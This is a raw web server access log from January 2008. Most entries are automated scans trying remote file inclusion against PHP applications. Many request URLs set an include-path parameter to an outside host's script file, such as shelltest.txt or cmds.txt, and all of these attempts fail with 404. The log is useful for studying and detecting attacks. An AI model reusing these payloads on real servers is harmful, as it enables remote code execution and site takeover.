190.43.11.254 - - [06/Jan/2008:17:07:49 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.2)"
216.117.137.122 - - [06/Jan/2008:17:07:51 -0800] "GET /logs/access_071224.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
190.43.11.254 - - [06/Jan/2008:17:07:52 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.2)"
216.117.137.122 - - [06/Jan/2008:17:07:52 -0800] "GET /logs/access_070826.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:08:08 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.98.150.12 - - [06/Jan/2008:17:08:41 -0800] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.herrn-der-zeiten.de/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.98.150.12 - - [06/Jan/2008:17:08:42 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.herrn-der-zeiten.de/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:09:06 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.25.195.74 - - [06/Jan/2008:17:09:06 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.15.129.105 - - [06/Jan/2008:17:09:18 -0800] "GET /logs/access_070702.log//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.25.195.74 - - [06/Jan/2008:17:09:24 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.15.129.105 - - [06/Jan/2008:17:09:25 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.15.129.105 - - [06/Jan/2008:17:09:26 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.15.129.105 - - [06/Jan/2008:17:09:27 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
217.67.237.143 - - [06/Jan/2008:17:10:00 -0800] "GET /logs/access_071217.log//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
217.67.237.143 - - [06/Jan/2008:17:10:00 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
217.67.237.143 - - [06/Jan/2008:17:10:00 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
163.27.43.2 - - [06/Jan/2008:17:10:03 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
163.27.43.2 - - [06/Jan/2008:17:10:03 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.98.150.12 - - [06/Jan/2008:17:10:13 -0800] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.herrn-der-zeiten.de/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.117.137.122 - - [06/Jan/2008:17:10:21 -0800] "GET /logs/access_071008.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
216.117.137.122 - - [06/Jan/2008:17:10:21 -0800] "GET /logs/access_070903.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
201.28.106.195 - - [06/Jan/2008:17:10:42 -0800] "GET /logs/access_071022.log/index.php?u=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:11:08 -0800] "GET /logs/access_071119.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:11:27 -0800] "GET /logs/access_071203.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.117.137.122 - - [06/Jan/2008:17:11:27 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.15.129.105 - - [06/Jan/2008:17:11:27 -0800] "GET /logs/access_070716.log//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.16.236.69 - - [06/Jan/2008:17:11:49 -0800] "GET /logs/index.php3?id=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.16.236.69 - - [06/Jan/2008:17:11:49 -0800] "GET /logs/index.php3?id=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.16.236.69 - - [06/Jan/2008:17:11:49 -0800] "GET /index.php3?id=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.16.236.69 - - [06/Jan/2008:17:11:49 -0800] "GET /index.php3?id=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.178.145.148 - - [06/Jan/2008:17:12:42 -0800] "GET /inc/common.load.php?env[include_prefix]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
193.178.145.148 - - [06/Jan/2008:17:12:42 -0800] "GET /inc/common.load.php?env[include_prefix]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.67.237.143 - - [06/Jan/2008:17:12:51 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.67.237.143 - - [06/Jan/2008:17:12:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.234.106.5 - - [06/Jan/2008:17:14:22 -0800] "GET /logs/access_071105.log//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
211.234.106.5 - - [06/Jan/2008:17:14:23 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
211.234.106.5 - - [06/Jan/2008:17:14:23 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
89.149.244.41 - - [06/Jan/2008:17:14:27 -0800] "GET /logs/access_070910.log//modules/xfsection/modify.php?dir_module=http://h1.ripway.com/mlengse/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.149.244.41 - - [06/Jan/2008:17:14:28 -0800] "GET //modules/xfsection/modify.php?dir_module=http://h1.ripway.com/mlengse/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.149.244.41 - - [06/Jan/2008:17:14:28 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://h1.ripway.com/mlengse/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.234.106.5 - - [06/Jan/2008:17:14:38 -0800] "GET /logs/access_071217.log//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
64.15.129.105 - - [06/Jan/2008:17:14:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.15.129.105 - - [06/Jan/2008:17:14:40 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.67.237.143 - - [06/Jan/2008:17:14:43 -0800] "GET /logs/access_070702.log//tools/send_reminders.php?noSet=0&includedir=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.25.195.74 - - [06/Jan/2008:17:15:02 -0800] "GET /logs/access_071217.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.25.195.74 - - [06/Jan/2008:17:15:09 -0800] "GET /logs/access_071217.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:15:10 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.25.195.74 - - [06/Jan/2008:17:15:10 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:15:10 -0800] "GET /logs/access_071217.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:15:10 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:15:10 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:15:11 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.25.195.74 - - [06/Jan/2008:17:15:15 -0800] "GET /logs/access_071217.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:15:18 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:15:19 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
201.28.106.195 - - [06/Jan/2008:17:15:22 -0800] "GET /logs/access.log/index.php?u=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.28.106.195 - - [06/Jan/2008:17:15:23 -0800] "GET /index.php?u=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.246.124.110 - - [06/Jan/2008:17:15:25 -0800] "GET /logs/access_071210.log/inc/common.load.php?env[include_prefix]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.124.110 - - [06/Jan/2008:17:15:25 -0800] "GET /logs/inc/common.load.php?env[include_prefix]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.28.106.195 - - [06/Jan/2008:17:15:25 -0800] "GET /logs/index.php?u=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:15:26 -0800] "GET /logs/access_071217.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:15:29 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.124.110 - - [06/Jan/2008:17:15:35 -0800] "GET /logs/access_071210.log/inc/common.load.php?env[include_prefix]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.124.110 - - [06/Jan/2008:17:15:35 -0800] "GET /logs/inc/common.load.php?env[include_prefix]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.244.41 - - [06/Jan/2008:17:16:07 -0800] "GET /logs/access_071029.log//modules/xfsection/modify.php?dir_module=http://h1.ripway.com/mlengse/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:16:14 -0800] "GET /logs/access_071217.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:16:14 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:16:14 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:16:59 -0800] "GET /logs/access_071217.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:16:59 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:17:00 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:17:10 -0800] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:17:12 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:17:13 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
204.209.81.1 - - [06/Jan/2008:17:17:17 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.209.81.1 - - [06/Jan/2008:17:17:17 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dd3str0y3r.110mb.com/scan/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.246.124.110 - - [06/Jan/2008:17:17:18 -0800] "GET /inc/common.php?env[include_prefix]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
210.155.83.79 - - [06/Jan/2008:17:18:00 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.spectrum-team.com/kel/id.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.155.83.79 - - [06/Jan/2008:17:18:05 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.spectrum-team.com/kel/id.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
219.94.144.249 - - [06/Jan/2008:17:18:28 -0800] "GET /logs/access_071119.log//adminfoot.php?path%5Bdocroot%5D=http://www.santacruzlive.com/ui/administrator/components/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
219.94.144.249 - - [06/Jan/2008:17:18:28 -0800] "GET /logs//adminfoot.php?path%5Bdocroot%5D=http://www.santacruzlive.com/ui/administrator/components/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.28.106.195 - - [06/Jan/2008:17:18:39 -0800] "GET /logs/access_071022.log/index.php?u=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:18:42 -0800] "GET /logs/access_071028.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:18:49 -0800] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
161.58.198.111 - - [06/Jan/2008:17:19:06 -0800] "GET /logs/access_070910.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:19:07 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
66.98.150.12 - - [06/Jan/2008:17:19:15 -0800] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.herrn-der-zeiten.de/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.25.195.74 - - [06/Jan/2008:17:19:29 -0800] "GET /logs/access_070924.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:19:29 -0800] "GET /logs/access_070924.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:19:29 -0800] "GET /logs/access_070924.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:19:29 -0800] "GET /logs/access_070924.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.25.195.74 - - [06/Jan/2008:17:19:29 -0800] "GET /logs/access_070924.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:19:29 -0800] "GET /logs/access_070924.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.74 - - [06/Jan/2008:17:19:32 -0800] "GET /logs/access_070924.log/convert/mvcw.php?step=1&vwar_root=http://growingkids.org/forum/resah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.98.150.12 - - [06/Jan/2008:17:19:38 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.herrn-der-zeiten.de/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
121.173.130.140 - - [06/Jan/2008:17:19:55 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
121.173.130.140 - - [06/Jan/2008:17:19:55 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:19:57 -0800] "GET /logs/access_071022.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
87.17.165.30 - - [06/Jan/2008:17:20:01 -0800] "GET /logs/access_071210.log/inc/dbase.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.17.165.30 - - [06/Jan/2008:17:20:01 -0800] "GET /inc/dbase.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.17.165.30 - - [06/Jan/2008:17:20:02 -0800] "GET /logs/inc/dbase.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:20:06 -0800] "GET /logs/access_071210.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
64.246.15.59 - - [06/Jan/2008:17:20:25 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.246.15.59 - - [06/Jan/2008:17:20:25 -0800] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.208.99.103 - - [06/Jan/2008:17:20:31 -0800] "GET /logs/access_071210.log/main.php?x=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.208.99.103 - - [06/Jan/2008:17:20:36 -0800] "GET /main.php?x=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.208.99.103 - - [06/Jan/2008:17:20:36 -0800] "GET /logs/main.php?x=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:20:44 -0800] "GET /logs/access_071217.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
66.7.198.72 - - [06/Jan/2008:17:20:46 -0800] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.26.24 - - [06/Jan/2008:17:21:05 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:21:07 -0800] "GET /logs/access_071001.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
72.30.216.93 - - [06/Jan/2008:17:21:09 -0800] "GET /logs/access_071105.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
202.133.244.36 - - [06/Jan/2008:17:22:01 -0800] "GET /logs/access_071015.log//include.php?path[docroot]=http://nexouz.we.bs/apc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
